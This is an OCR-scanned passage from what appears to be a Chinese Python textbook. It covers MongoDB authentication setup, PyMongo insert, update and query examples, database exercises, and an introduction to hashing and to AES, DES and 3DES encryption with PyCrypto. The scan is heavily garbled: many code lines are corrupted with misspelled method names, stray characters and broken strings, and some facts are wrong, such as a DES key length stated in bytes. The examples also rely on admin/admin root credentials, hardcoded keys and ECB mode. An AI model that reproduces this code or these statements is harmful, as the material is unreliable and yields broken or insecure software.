(2) 修改 system. version 文档 里 面 的 authSchema 版 本 为 3, 初 始 安装 的 时 候 应 该 是 5， 
命令 行为 

> use admin 

Switched to db admin 

> var schema = db. system. version. findOne({"_id" : "authSchema"}) 

> Schema. currentVersion = 3 

3 

> db. system. version. save(schema) 


(3) 删除 旧账 号 : 


use admin 


db. dropUser ("myuser") 
(4) 创建 新 账号 : 


db. createUser( {user: "admin", pwd: "admin", roles: [{role: "root", db: "adnmin" }]}) 
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(5) 开户 认证 : 


> mongod 一 上 mongod. conf - rest 


9.7.2 Python 操作 MongoDB 

Python 要 连接 MongoDB, 需 要 安装 PyMongo 驱动 程序 ,各 平台 通用 的 安装 方法 如 下 
所 示 。 

python3 —m pip install pymongo 

接 下 来 就 是 用 PyMongo 来 操作 MongoDB 了 。 

1. 导入 MongoClient 

首先 要 从 PyMongo 中 导入 MongoClient: 


>>> from pymongo import MongoClient 
2. 建立 连接 


>>> client = MongoClient() 


如 果 未 给 MongoClient 指定 参数 ,那么 MongoClient 默认 运行 在 LocalHost 的 27017 
端口 ,也 可 以 使 用 MongoDB URI 指定 一 个 完整 的 连接 。 如 : 


>>> client = MongoClient("mongodb://mongodb0. example. net:27019") 

MongoClient 指定 了 连接 到 mongodb0. example. net 系统 上 27019 端口 的 MongoDB 
实例 。 也 可 以 使 用 下 列 方式 建立 连接 : 

>>> client = MongoClient('192.168.1.106', 27017) 

若 连 接 需 要 认证 ,连接 方法 如 下 所 示 : 


>>> db auth = client.admin 

>>> db_auth. authenticate("admin", "admin") 
井 这 里 的 admin 为 用 户 名 与 密码 

>>> db = client. test_database 


或 者 : 


from pymongo import MongoClient 
uri = "mongodb://USERNAME:password(@® host:27017" 
client = MongoClient(uri) 


3. 访问 数据 库 对 象 
>>> db = client. test database 


一 个 MongoDB 实例 支持 多 个 独立 的 数据 库 , 当 使 用 PyMongo 工作 时 ,可 以 使 用 属性 
风格 来 访问 MongoClient 实例 。 也 可 以 使 用 字典 风格 ,如 : 


>>> db = client[ 'test ~ database'] 
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4. 获取 集合 
>>> collection = db.test collection 
或 者 : 


>>> collection = db['test— collection'] 


5. 文档 


在 MongoDB 中 数据 被 描述 为 JSON 风格 的 文档 ,在 PyMongo 中 我 们 使 用 字典 来 描述 
文档 ,下 面 使 用 字典 来 描述 博客 的 博文 : 


>>> import datetime 
>>> post = {"author":" 李 四 ","text": "我 的 第 一 篇 博文 !", "tags": ["mongodb",， "python", 
"pymongo" ], "date" : datetime. datetime. utcnow( )} 


6. 插入 数据 
1) insert_one() 方 法 插入 单个 文档 
往 posts 集合 中 ,插入 一 个 文档 。 


>>> posts = db.posts 
>>> posts. insert_one( post) 


2) insert_many() 方 法 批量 插入 文档 
为 了 实现 批量 插入 的 目的 , 先 定 义 一 个 列表 ,然后 使 用 insert_many() 方 法 批量 插入 
数据 。 


>>> new_posts = [{"author": " 王 五 "， 
"text": " 王 五 的 博客 !"， 
"tags": ["bulk", "insert"], 
"date" : datetime. datetime(2016, 4, 30, 15, 14)}, 
{"author" : " 麻 六 "， 
"title" : "MongoDB 太 好 玩 了 "， 
"text": "并 且 相当 的 容易 ,优美 !"， 
"date" : datetime. datetime(2016, 4, 30, 15, 15)}] 
>>> result = posts. insert many(new posts) 
>>> result. inserted_ ids 


[ObjectId( '57245a3de75cf91c88f70bdf'), ObjectId('57245a3de75cf91c88f70be0')] 


3) save() 方 法 保存 文档 


>>> import datetime 

>>> post= { "title" :"MongoDB 使 用 心得 ", "text":"MongoDB 的 结构 非常 类 似 于 Python 的 字典 . "， 
"date" : datetime. datetime(2016, 5, 3, 15, 15)} 

>>> db. posts. save( post) 


7. 更 新 数据 
文档 插入 数据 库 后 ,就 可 以 使 用 更 新 它 了 。 
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1) 更 新 一 个 文档 


>>> postl = db.posts.find one({"author":" 王 五 "}) 
>>> postl["text"] = "我 刚刚 接触 MongoDB, 还 不 太 了 解 它 , 以 后 再 发 博文 " 
>>> posts. update({"_id":post1["_id"]},post1) 


{'ok': 1, 'nModified': 1, 'n': 1, ‘updatedExisting': True} 


2) $ set 修改 器 
用 来 指定 一 个 字段 的 值 。 如 果 这 个 字段 不 存在 , 则 创建 它 。 


>>> posts. update ({"”_id":postl["_ id"]},{"$set":{"text":"Text 已 经 修改 过 了 .…"， 
"pageview" :1}}) 


3) $inc 修改 器 

给 记录 中 的 pageview 对 应 值 加 1, 如果 没有 pageview 这 个 Key 就 创建 ,并 赋值 1。 
$inc 只 能 用 于 整 型 长 整 型 或 双 精 度 浮 点 型 的 值 ,用 于 其 他 类 型 的 数据 上 , 则 会 导致 操作 
失败 。 

>>> posts. update({"_id":post1["_id"]},{"$ inc": {"pageview" :1}}) 

{'ok': 1, ‘nModified': 1, 'n': 1, 'updatedExisting': True} 

>>> posts. find_one({"_id" :post1['_id']}) 


{'_id': ObjectId( '57285e77e75cf90a60bd9295')，'text': 'Text 已 经 修改 过 了 '，'pageview': 2, 
'author': ' 王 五 ','tags': ['bulk', ‘insert'], 'date': datetime. datetime(2016, 4, 30, 15, 14)} 


4) $ push 修改 器 

给 数组 类 型 的 值 append 一 个 值 : 

>>> posts. update({"_id":post1["_id"]},{"$ push":{"tags":"Test"}}) 
{'ok': 1，'nModified': 1, 'n': 1, ‘updatedExisting': True} 

> posts, find one( {" id":posti[ id']}) 


{'_id': ObjectId( '57285e77e75cf90a60bd9295')，'text': 'Text 已 经 修改 过 了 '，'pageview': 2, 
'author': ' 王 五 '，'tags': ['bulk', ‘insert', 'Test'], 'date': datetime. datetime(2016, 4, 30, 15, 
14)} 


5) $ addToSet 修改 器 

给 数组 类 型 的 值 append 一 系列 值 ,同时 确保 不 会 有 重复 值 : 

>>> posts.update({"” id" :postl["” id"]},{" $addToSet":{"tags":{" $ each":["bulk", "Each"]}}}) 
{'ok': 1, 'nModified': 1, 'n': 1, ‘updatedExisting': True} 

>>> posts. find_one({"_id" :post1['_id']}) 


{'_id': ObjectId( '57285e77e75cf90a60bd9295')，'text': 'Text 已 经 修改 过 了 '，'pageview': 2, 
'author': ' 王 五 '，'tags': ['bulk', ‘insert', 'Test', 'Each'], 'date': datetime. datetime(2016, 4, 
0 IS .14 
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头 部 删除 。 
>>> posts.update({"_id" :post1["_id"]},{" $ pop":{"tags":1}}) 
{'ok': 1, 'nModified': 1, 'n': 1, ‘updatedExisting': True} 
>>> posts. find_one({"_id":post1['_id']}) 
{'_id': ObjectId( '57285e77e75cf90a60bd9295')，'text': 'Text 已 经 修改 过 了 '，'pageview': 2, 
'author': ' 王 五 ', 'tags': ['bulk', ‘insert', 'Test'], 'date': datetime. datetime(2016, 4, 30, 15, 
14)} 
>>> posts. update({"_id":post1["_id"]},{"$ pop":{"tags": — 1}}) 
{'ok': 1，'nModified': 1, 'n': 1, ‘updatedExisting': True} 
>>> posts. find_one({"_id":post1['_id']}) 
{'_id': ObjectId( '57285e77e75cf90a60bd9295')，'text': 'Text 已 经 修改 过 了 '，'pageview': 2, 


'author': ' 王 五 '，'"tags': ['insert', 'Test'], 'date': datetime. datetime(2016, 4, 30, 15, 14)} 


7) $ pull 修改 器 
删除 数组 中 所 有 匹配 的 值 。 


>>> posts.update({"” id" :postl["” id"]},{"$ pull":{"tags":"insert"}}) 

{'ok': 1，'nModified': 1, 'n': 1, ‘updatedExisting': True} 

>>> posts. find one({"_id":post1i["_id"]}) 

{'_id': ObjectId( '57285e77e75cf90a60bd9295')，'text': 'Text 已 经 修改 过 了 '，'pageview': 2, 


'author': ' 王 五 '，'tags': ['Test'], 'date': datetime. datetime(2016, 4, 30, 15, 14)} 


8) $ 定位 符 
在 很 多 情况 下 ,不 知道 要 修改 的 数组 的 下 标 , 这 时 就 可 以 用 *$ ”来 定位 查询 文档 已 经 匹 
配 的 数组 元 素 ,并 进行 更 新 。 


>>> posts. update({"tags":"Test"},{"$ set":{"tags. $":"Hello"}}) 
{'ok': 1, 'nModified': 1, 'n': 1, 'updatedExisting': True} 


>>> for row in db. posts. find( ): 


IOW 


{'_id': ObjectId( '57285e77e75cf90a60bd9295')，'text': 'Text 已 经 修改 过 了 '，'pageview': 2, 
'author': ' 王 五 '，'tags': ['Hello'], 'date': datetime. datetime(2016, 4, 30, 15, 14)} 
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9) 更 新 多 个 文档 

update 的 语法 为 

db. 集 合 名 .update(criteria, objNew, upsert, mult) 
criteria: 需要 被 更 新 的 条 件 表达 式 。 

objNew: 更 新 表达 式 。 

upsert: 如 目标 记录 不 存在 ,是 否 插入 新 文档 。 
mnult: 是 否 更 新 多 个 文档 。 


>>> d = datetime. datetime(2016, 5, 4,16) 
>>> db. posts. update({"date": {" $1t": d}},{"text":"Text 已 经 修改 过 了 "}, False,True) 


此 语句 修改 日 期 比 5 月 4 日 早 的 多 个 文档 。 
8. 删除 数据 
删除 指定 的 文档 : 


>>> db. posts. remove({"author" :" 王 五 "}) 


OOoo 2 


{frok' 1, mn': 1} 


删除 整个 集合 : 


>>> db. posts. drop() 


9. 查询 
现在 往 user 集合 中 插入 多 个 文档 ,语句 如 下 : 
>>> users = [{"name":" 张 三 ", "age":18}, {"name":" 李 四 ","age":19}, {"name":" 李 小 明 ","age": 


35}, {"name":" 马 驰 ", "age":23}] 
>>> db. user. insert_ many(users) 


1) 单个 数据 查询 


>>> db. user. find_one() 
{'name': ' 张 三 ',，'_id': ObjectId( '5728b371e75cf90a60bd9299')，'age': 18} 


>>> for u in db. user. find({"name":" 张 三 "}) :print(u) 


{'name': ' 张 三 ',，'_id': ObjectId('5728b371e75cf90a60bd9299')，'age': 18} 


2) 查询 特定 字段 


>>> for u in db.user.find({"name" :" 张 三 "},["name","age"]):print(u) 
>>> for ul in db. user. find({},{"name":1,"age":1}):print(u1) 
>>> for u2 in db.user.find({},{"name":1,"_ id":0}):print(u2) 


{'name': ' 张 三 '} 
{'name': ' 李 四 站 
{'name': ' 李 小 明 '} 
{'name': ' 马 驰 '} 
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在 默认 情况 下 ,总 是 返回 _id 的 值 , 通 过 "id" :0 把 id 字段 剔除 。 

3) 条 件 查询 

MongoDB 中 的 比较 操作 符 有 " $1t"" $lte"" $gt"" $gte"" $ne" ,它们 分 别 对 应 于 
CT 

>>> for u in db. user. find({"age":{" $1t":20}}): print(u) 

{'name': ' 张 三 '，'_id': ObjectId('5728b371e75cf90a60bd9299')，'age': 18} 

{'name': ' 李 四 ',，'_id': ObjectId('5728b371e75cf90a60bd929a')，'age': 19} 


>>> for u2 in db. user.find({"age":{" $ gte":18," $ lte" :30}}): print(u2) 


查询 年 龄 大 于 等 于 18 岁 ,小 于 等 于 30 岁 的 所 有 文档 。 
4) $in, $nin 


>>> for u3 in db. user. find({"name":{"$ in":[" 张 三 ", " 李 四 "]}}): print(u3) 
5) $or 


>>> for ul in db. user. find({" $ or":[{"name":{" $ in":[" 张 三 ", " 李 四 "]}}, {"age" :23}]}): 
print(ul1) 


{'_id': ObjectId('5728b371e75cf90a60bd9299')，'age': 18，'name': ' 张 三 '} 
{'_id': ObjectId('5728b371e75cf90a60bd929a')，'age': 19，'name': ' 李 四 '} 
{'_id': ObjectId('5728b371e75cf90a60bd929c')，'age': 23，'name': ' 马 驰 '} 


6) $and 


>>> for u2 in db. user. find({" $and":[{"age":{" $1t":30}}, {"name":{" $regex": ' 李 ', 
" $options" :"i"}}]}): 
print(u2) 


{'_id': ObjectId('5728b371e75cf90a60bd929a')，'age': 19，'name': ' 李 四 '} 


7) 正则 表达 式 
正则 表达 式 是 进行 文本 匹配 时 非常 高 效 的 工具 ,具体 的 规则 请 参考 相关 资料 。 


for u2 in db. user. find({"name":{" $ regex":" 李 "}}): 
print(u2) 


{'_id': ObjectId('5728b371e75cf90a60bd929a')，'age': 19，'name': ' 李 四 '} 
{'_id': ObjectId( '5728b371e75cf90a60bd929b')，'age': 35，'name': ' 李 小 明 '} 


8) 排序 

排序 时 ,用 到 pymongo. ASCENDING 和 pymongo. DESCENDING ,它们 的 值 分 别 可 以 
用 1 和 一 1 来 代替 。 

>>> import pymongo 


>>> for u in db. user. find(). sort([("age", pymongo. ASCENDING)]): 
print(u) 
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{'_id': ObjectId('5728b371e75cf90a60bd9299')，'age': 18，'name': ' 张 三 '} 
{'_id': ObjectId('5728b371e75cf90a60bd929a')，'age': 19，'name': ' 李 四 '} 
{'_id': ObjectId('5728b371e75cf90a60bd929c')，'age': 23，'name': ' 马 驰 '} 
{'_id': ObjectId( '5728b371e75cf90a60bd929b')，'age': 35，'name': ' 李 小 明 '} 


9) 切片 
未 加 限定 条 件 时 的 输出 结果 : 


>>> for u in db.user.find() : 


print(u) 
{'_id': ObjectId('5728b371e75cf90a60bd9299')，'age': 18，'name': ' 张 三 '} 
{'_id': ObjectId('5728b371e75cf90a60bd929a')，'age': 19，'name': ' 李 四 '} 
{'_id': ObjectId('5728b371e75cf90a60bd929b')，'age': 35，'name': ' 李 小 明 人 小 
{'_id': ObjectId('5728b371e75cf90a60bd929c')，'age': 23，'name': ' 马 驰 '} 


加 限定 条 件 后 的 输出 结果 : 


>>> for u in db. user. find(). skip(2).1imit(3): print(u) 
{'_id': ObjectId('5728b371e75cf90a60bd929b')，'age': 35，'name': ' 李 小 明 '} 
{'_id': ObjectId('5728b371e75cf90a60bd929c')，'age': 23，'name': ' 马 驰 '} 


也 可 以 用 切片 代替 skip & limit, MongoDB 中 的 $slice 似乎 有 点 问题 ,可 采用 下 面 的 
方法 : 
>>> for u in db.user. find()[2:5]: print(u) 


10) 统计 集合 的 文档 数 


>>> print(db. user. count()) 


4 
习 题 

一 、 选 择 题 
1. 在 SELECT 语句 中 使 用 ( 。”) 子 句 可 以 对 结果 集 进行 排序 。 

A. GROUP BY B. SORT BY C. ORDER BY DD. WHERE 
2. 可 以 使 用 下 列 ( “) 往 数据 库 中 添加 数据 。 

A. INSERT B. UPDATE C. APPEND D. CREATE 
3. 可 以 使 用 ( “”) 语 句 建立 数据 库 。 

A. NEW DATABASE B. CREATE DB 

C. NEW DATABASE D. CREATE DATABASE 


4. Python 连接 数据 库 时 ,通过 ( ) 属 性 ,指定 数据 库 所 在 主机 。 
A. host B. user C. db D. charset 
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5. 在 游标 中 ,通过 ( ) 取 回 结果 集中 的 下 一 行 。 


A. fetchall() B. fetchone() C. next() D. excute() 
6. 在 数据 库 的 连接 对 象 中 ,可 以 通过 ( ) 方 法 提交 事务 。 

A. commit() B. rollback() C. fetchall() D. fetchone() 
二 、 编程 题 


1. 在 IDLE 解释 器 下 ,用 语句 创建 一 个 SQLite 3 数据 库 , 库 名 为 C:\MyDB. db, 该 库 中 
有 一 数据 表 myfriends ,字段 有 name、sex、address、telephone、qq、wechat, 往 表 中 插入 两 条 
记录 。 

2. 编写 一 个 程序 , 往 第 1 题 生成 的 表 中 插入 3 条 记录 。 

3. 编写 一 个 程序 ,查询 第 1 题 表 的 某 条 记录 ,并 显示 出 来 。 


加 解密 算法 分 为 三 类 : 对 称 加 密 算法 、 非 对 称 加 密 算法 和 Hash 加 密 算法 。 

对 称 加 密 就 是 加 密 和 解密 使 用 同一 个 密 钥 ,通常 称 为 Session Key。 这 种 加 密 技 术 在 当 
今 被 广泛 采用 ,如 美国 政府 所 采用 的 DES 加 密 标准 就 是 一 种 典型 的 对 称 加 密 算法 , 它 的 
Session Key 长 度 为 56 字 节 。 典 型 的 对 称 加 密 算法 有 以 下 几 种 。 

(1) DES(Data Encryption Standard) : 对 称 加 密 算法 ,数据 加 密 标准 ,速度 较 快 ,适用 于 
加 密 大 量 数据 的 场合 。 

(2) 3DES(Triple DES) : 是 基于 DES 的 对 称 加 密 算 法 ,对 一 块 数据 用 三 个 不 同 的 密 钥 
进行 三 次 加 密 ,强度 更 高 。 

(3) RC2 和 RC4: 对 称 加 密 算 法 ,用 变 长 密 钥 对 大 量 数据 进行 加 密 , 比 DES 快 。 

(4) IDEA(International Data Encryption Algorithm) : 国际 数据 加 密 算法 ,使 用 128 位 
密 钥 提供 非常 强 的 安全 性 。 

(5) AES(Advanced Encryption Standard) : 高 级 加 密 标准 .对称 加 密 算法 ,是 下 一 代 的 
加 密 算法 标准 ,速度 快 ,安全 级 别 高 ,在 21 世纪 AES 标准 的 一 个 实现 是 Rijndael 算法 。 

常用 的 加 密 算法 如 表 10-1 所 示 。 


表 10-1 常用 的 加 密 算法 


























加 密 算 法 密 钥 长 度 数据 块 长 度 
AES 16 字 节 、24 字 节 或 32 字 节 16 字 节 
RC2 从 1 一 128 字 节 都 可 以 8 字 节 
RC4 从 1 一 256 字 节 都 可 以 
Blowfish 可 变 长 度 8 字 节 
CAST 可 变 长 度 8 字 节 
DES 8 字 节 8 字 节 
3DES (Triple DES) 16 字 节 8 字 节 
IDEA 16 字 节 8 字 节 








非 对 称 加 密 就 是 加 密 和 解密 所 使 用 的 密 钥 不 是 同一 个 ,通常 有 两 个 密 钥 , 称 为 “ 公 钥 ?和 
“ 私 钥 ” ,它们 两 个 必须 配对 使 用 ,否则 不 能 打开 加 密 文件 。 公 钥 是 指 可 以 对 外 公布 的 , 私 钥 
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则 不 能 ,只 能 由 持 有 人 一 个 人 知道 。 它 的 优越 性 就 在 这 里 ,因为 对 称 加 密 算法 如 果 是 在 网 络 
上 传输 加 密 文件 就 很 难 把 密 钥 告 诉 对 方 , 不 管用 什么 方法 都 有 可 能 被 别人 窃听 到 。 而 非 对 
称 加 密 算 法 有 两 个 密 钥 ,上 且 其 中 的 公 钥 是 可 以 公开 的 ,也 就 不 怕 别 人 知道 ,发 件 人 用 公开 获 
得 的 收 件 人 的 公 钥 对 文件 进行 加 密 , 加 密 后 的 文件 发 送 给 收 件 人 后 , 收 件 人 用 自己 的 私 钥 才 
能 解 开 , 密 件 即 使 被 其 他 人 获得 ,因为 没有 公 钥 对 应 的 私 钥 ,他 是 打 不 开 这 个 密 件 的 ,这 样 就 
很 好 地 解决 了 密 钥 的 传输 安全 性 问题 。 非 对 称 加 密 算 法 性 能 相对 较 差 ,因此 多 用 于 加 密 关 
键 性 信息 ,如 对 称 加 密 的 密 钥 等 。 

RSA 算法 是 典型 的 非 对 称 加 密 算 法 ,由 RSA 公司 发 明 ,使 用 较为 广泛 ; 其 他 的 非 对 称 
加 密 算 法 还 有 ECC (移动 设备 用 )、Diffie-Hellman、ElGamal、DSA( 数 字 签 名 用 ) 等 ,如 
表 10-2 所 示 。 


表 10-2 典型 的 非 对 称 加 密 算法 














算 法 作 用 
RSA 加 密 、 认 证 、 签 名 
ElGamal 加 密 、 认 证 、 签 名 
DSA 认证 、 签 名 


Hash 算法 严格 来 说 ,不 能 算是 加 密 算 法 ,只 能 算是 摘要 算法 , 即 从 不 定 长 的 字符 序列 
抽取 出 定 长 的 摘要 值 。 主 要 用 于 确保 信息 的 不 可 更 改 性 。 比 如 ,发 件 方 在 发 送 文件 之 前 , 先 
计算 一 下 文件 的 摘要 , 收 件 人 收 到 文件 后 ,再 计算 一 下 文件 的 摘要 , 若 两 个 摘要 值 一 样 , 则 说 
明文 件 没 被 改动 过 ; 若 摘要 值 不 同 , 则 说 明文 件 在 发 送 过 程 中 被 改动 过 。 

典型 的 Hash 算法 有 SHA(Secure Hash Algorlthm ,安全 散 列 算法 )、MD5 (Message- 
Digest Algorithm 5 ,信息 - 摘 要 算法 ) 等 ,MD5 得 到 一 个 128 位 的 摘要 值 ,SHA-1 将 得 到 一 
个 160 位 的 摘要 值 ,具体 如 表 10-3 所 示 。 


表 10-3 Hash 算法 

















Hash 算法 摘要 长 度 安全 程度 

MD2 128 位 不 安全 ,已 不 使 用 

MD4 128 位 不 安全 ,已 不 使 用 

MD5 128 位 不 安全 ,已 不 使 用 

RIPEMD160 160 位 安全 

SHA1 160 位 安全 性 已 不 牢固 ,请 远离 ,不 要 使 用 它 
SHA256 256 位 安全 











Python 社区 提供 的 加 解密 模块 有 PyCrypto, 它 的 官网 地 址 是 https://www. dlitz. net/ 
software/pycrypto/ ,安装 方法 是 C:\Python34 记 pip install pycrypto。 

八 注 意 . 在 PyCrypto 安装 过 程 中 ,需要 对 源 代码 进行 编译 ,所 以 需要 安装 VS 2010， 
建议 安装 VC++ 专 业 版 及 以 上 版 本 。 这 种 编译 虽然 可 以 通过 ,但 在 使 用 过 程 中 可 能 会 出 现 
一 些 意 想不到 的 问题 。 可 以 到 https://www. voidspace. org. uk/python/modules. shtml# 
pycrypto 下 载 已 经 编译 过 的 安装 包 。 可 以 到 https://github. com/sfbahr/PyCrypto- 
Wheels/ 下 载 适合 于 Python 3.5 的 WHL 文件 ,也 可 以 使 用 pip 命令 直接 安装 ,64 位 系统 下 





局 
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安装 命令 为 pip install 一 use-wheel 一 no-index 一 find-links 一 https://github. com/sfbahr/ 
PyCrypto-Wheels/raw/master/ pycrypto-2. 6. 1-cp35-none-win_amd64. whl pycrypto; 32 位 系统 
下 安装 命令 为 pip install --use-wheel 一 no-index 一 find-links 二 https://github. com/ sfbahr/ 
PyCrypto-Wheels/raw/master/ pycrypto-2. 6. 1-cp35-none-win32. whl pycrypto。 

CentOS 6.6 的 Python 3.4.3 下 安装 方法 是 : 

[root@Python - server testuser]# pip3 install pycrypto 

在 Windows 下 ,如 果 下 载 的 是 二 进 制版 PyCrypto, 则 可 以 直接 安装 ,不 需要 安装 C++ 编 
译 器 ,也 不 会 出 现 编译 错误 。 在 Windows 7 的 64 位 系统 中 安装 PyCrypto 的 界面 如 图 10-1 
所 示 。 


pycrypto-2.6.1 


Ts vaednarad woh eso creue Oo Net ocomao 
2 


Bente D190 190 mm damra40 


aa aa | 





图 10-1 在 Windows 7 的 64 位 系统 中 安装 PyCrypto 
PyCrypto 帮助 文档 的 地 址 是 https://www. dlitz. net/software/pycrypto/api/2. 6/ ,可 


以 参考 。 


10.1 Hash 函数 


10.1.1 Python 中 的 Hash 捕 数 
Python 中 提供 了 HashLib 模块 ,可 以 直接 使 用 该 模块 获得 摘要 值 。 
获得 MD5 摘要 : 


>>> import hashlib 
>>>m = hashlib.md5() 
>>> m. update(b'The text will be extracted digest value') 


八 注意 车 字符 囊 前 加 b, 则 表示 使 用 字 节 字面 值 ,而 非 字 符 囊 字面 值 ; 若 不 加 则 报 





Unicode-objects must be encoded before hashing 错误 。 


>>> md5value = m. hexdigest() 
>>> print (md5value) 


7b5de66e886367a346b522bf63f5a663 


>>> data= ' 这 段 文字 将 被 抽取 摘要 值 ' 

> nm = lashlib.md5(data encode(encoding = 'gb2312')) 

井 通过 encode(encoding = 'gb2312') 把 unicode 码 转变 为 gb2312 字 节 码 
>>> print(m. hexdigest() ) 


57cfaf4d8e74ecdc6182f0c78e5fa7c3 


也 可 以 获得 sha 摘要 值 。 


>>> import hashlib 
>>>a = b'The text will be extracted digest value' 
>>> print (hashlib. md5(a). hexdigest()) 


7b5de66e886367a346b522bf63f5a663 

>>> print(hashlib. shal(a). hexdigest()) 
41c78c7056af0c79fa561564c8776eaaa05f6e2d 

>>> print(hashlib. sha224(a). hexdigest()) 
f62baead84b21c300a89c316deee3cb2083431b85e96c68a22f3b492 

>>> print(hashlib. sha256(a). hexdigest()) 
ed9c387f0b966c77d2e29fcc3f7c76e7406dc27196999ela8364144dfe59facl 
>>> print(hashlib. sha384(a). hexdigest()) 


7e37599c6b84b300d24c8d38caf84f2a34cbc12f779bd96a442927833fc08el7fa3c313c4b10dbc8b8c3773 
9f23da7d1 


>>> print (hashlib. sha512(a). hexdigest()) 


e640f2452ff35f53d0901e926019f56921b90e056355102b86bfe8e074bb8elae5ea3164f14040d841c3c36 
8e7c7afd05db52eb712780aadedaf63a6d95c5d41 


10.1.2 Crypto 中 的 Hash 函数 
Crypto 模块 的 功能 更 强大 , 它 提供 了 更 多 的 安全 相关 的 函数 。 如 获取 字符 串 的 


SHA256 摘要 。 


>>> from Crypto. Hash import SHA256 

>>> hash = SHA256.new() 

>>> hash.update(b'This is an example for SHA256 digest') 
>>> hash. digest() 


b'\xa3g&g\x9e\xbd\xbe\xd0\x17(@\xdb\x88\xd4\x84N\xa2\xc6h\x1f\x87;S6 + \x91 % \\F}\x01\xbf\ 
n\xe4' 


使 用 Crypto 获取 MD5 摘要 值 : 


>>> from Crypto. Hash import MD5 

>>> h = MD5. new() 

>>> h. update(b'Tom, I will give you 1000$ ') 
>>> print(h. hexdigest()) 


"a4de46e4ada31931f9d3a55f1749eb27"” 


>>> h2 = MD5.new() 
>>> h2. update(b"Tom, I will give you 100000 $ ") 
>>> h. hexdigest() 


"上 flb7e9c4e3610f30d698e4dd266568f1 7 


10.2 对称 加 密 算法 


10.2.1 AES 加 解密 


>>> from Crypto. Cipher import AES 

>>> from Crypto import Random 

>>> key = "Sixteen byte key" 

# 密 钥 为 16 字 节 ,128 位 ,不 然 会 出 现 错误 

>>> iv = Random. new().read(AES. block size) 
井 iv 为 初始 化 向 量 

>>> message = "The stri encrypt" 

# 被 加 密 的 数据 应 该 是 16 字 节 的 倍数 

>>> cipher = AES.new(key, AES.MODE CBC, iv) 
# AES. MODE_CBC 为 密 文 分 组 链接 , AES. MODE_CEB 为 密 文 反馈 模式 ,用 于 流 加 密 方式 
#ECB 为 电子 密码 本 模式 

>>> ciphertext = cipher. encrypt(message) 
>>> ciphertext 


b'J\x0b\xc9\xbf\xbb\xd0\x85'v\xc6\x18U0\x00R\xa5' 


>>> cipher2 = AES.new(key, AES.MODE CBC, iv) 
>>> cipher2. decrypt (ciphertext) 


b'The stri encrypt"' 


八 注意 : AES 的 加 密 密 负 的 字 节 长 一 定 要 是 16 字 节 、24 字 节 、32 字 节 ,初始 化 向 量 
iv 的 字 节 长 一 定 要 是 16 字 节 。 被 加 密 的 字符 囊 一 定 要 为 16 字 节 的 倍数 。 


10.2.2 DES 加 解密 


>>> from Crypto. Cipher import DES 
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>>> obj = DES. new( 'abcdefgh', DES.MODE ECB) 

井 密 钥 长 度 为 8 字 节 

井 这 里 使 用 MODE_ECB 模式 ,不 需要 iv 

井 如 果 使 用 MODE_CBC 或 MODE_CFB 模式 ,必须 提供 iv 值 
>>> plain = "Guido van Rossum is a space alien." 

>>> len(plain) 


34 


>>> obj. encrypt (plain) 


Traceback (most recent call last): 
File "<pyshell#8>", line 1, in<module> 
obj. encrypt (plain) 
File "C:\Python34\1ib\site - packages\Crypto\Cipher\blockalgo. py", line 244, in encrypt 
return self._ cipher.encrypt(plaintext) 
ValueError: Input strings must be a multiple of 8 in length 


# 错 误 提 示 信 息 告 诉 人 们 ,输入 的 加 密 信 息 一 定 要 是 8 字 节 的 倍数 , 若 不 是 需要 补 齐 

>>> ciph = obj. encrypt (plain + 'XXXXXX') 

间 Python 3.x 下 encrypt('string') 中 的 string 一 定 要 是 字 节 缓存 ,encrypt() 将 会 返回 一 个 字 节 对 象 
# 因 此 ,在 处 理 中 文 时 ,一 定 要 把 Unicode 编码 转换 为 字 节 码 


>>> ciph 


b'\x11, \xe3Nq\x8cDY\xdfT\xe2pA\xfa\xad\xc9s\x88\xf3, \xc0j\xd8\xa8\xca\xe7\xe2I\xdl5w\ 
xld61\xc3dgb/\x06" 


>>> obj. decrypt (ciph) 


b'Guido van Rossum is a space alien. XXXXXX' 


10.2.3 3DES 加 解密 


DES 加 密 密 钥 长 度 为 64 位 ,实际 起 作用 的 是 56 位 ,使 用 中 人 们 感觉 到 DES 算法 的 加 
密 强 度 不 够 ,后 来 又 推出 了 3DES 算法 。3DES 是 被 美国 国家 标准 及 技术 研究 所 认证 的 对 
称 块 加 密 标 准 。 它 有 修正 的 8 字 节 长 的 数据 块 , 密 钥 的 字 节 长 度 是 128 位 或 192 位 ,但 是 ， 
8 位 中 的 1 位 是 元 余 的 , 它 对 安全 是 没有 贡献 的 ,有 效 的 密 钥 的 字 节 长 度 是 112 位 或 
168 位 。 

3DES 有 3 个 简单 的 DES 加 密 密 钥 ,明文 被 用 第 一 个 密 钥 K1 加 密 , 然 后 被 用 第 二 个 密 
钥 K2 解密 ,最 后 又 被 用 第 三 个 密 钥 K3 加 密 ; 解密 时 , 密 文 按 刚 才 的 逆序 进行 解密 。 

192 位 的 密 钥 是 由 3 个 子 密 钥 K1、K2、K3 捆绑 形成 的 , 当 K1 王 K3 时 ,3DES 旷 变 为 密 
钥 为 128 位 的 双 密 钥 对 称 加 密 算法 ; 当 K1==K2 时 ,3DES 旷 变 成 DES 算法 ,因此 ,一 定 要 
保证 3 个 子 密 钥 互 不 相同 。 

3DES 加 密 不 如 AES 算法 高 效 安全 。 

下 面 是 3DES 加 解密 的 实例 。 

例 [chl10 2 3 3DES. py】 


1. import os 
2. from Crypto. Cipher import DES3 
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. if _name_ =="'_ main 


from Crypto import Random 
def encrypt file(in filename, out filename, chunk size, key, iv): 
des3 = DES3.new(key, DES3.MODE CFB, iv) 
with open( in filename, 'rb') as in file: 
with open(out filename, 'wb') as out file: 
while True: 
chunk = in file.read(chunk size) 
if len(chunk) == 0: 
break 
elif len(chunk) % 16 != 0: 
pacelen = DES3.block size - len(chunk) % DES3.block size 
chunk += (chr(pacelen) * pacelen).encodel( 'GBK') 
out file.write(des3.encrypt(chunk)) 


. def decrypt file(in filename, out filename, chunk size, key, iv): 


des3 = DES3.new(key, DES3.MODE CFB, iv) 
with open(in filename, 'rb') as in file: 
with open(out_ filename, wb') as out file: 
while True: 
chunk = in file.read(chunk size) 
if len(chunk) == 
break 

s = des3.decrypt(chunk) 
s=s[:-ord(s[len(s)-1:])] 
out file.write(s) 


key = "Sixteen byte key” 
iv = Random. new( ) . read(DES3. block_size) 
with open('to_enc. txt', 'r') as f: 
print( 'to enc.txt: %s' % f.read()) 
encrypt_filel('to enc.txt', 'to enc.enc', 8192, key, iv) 


with open( 'to_enc.enc', 'rb') as f: 
print('to enc.enc: $%s' % f.read()) 


decrypt_filel('to enc.enc', 'to enc.dec', 8192, key, iv) 


with open( 'to_enc. dec', 'r') as ff: 
print('to enc.dec: %s' % f.read()) 


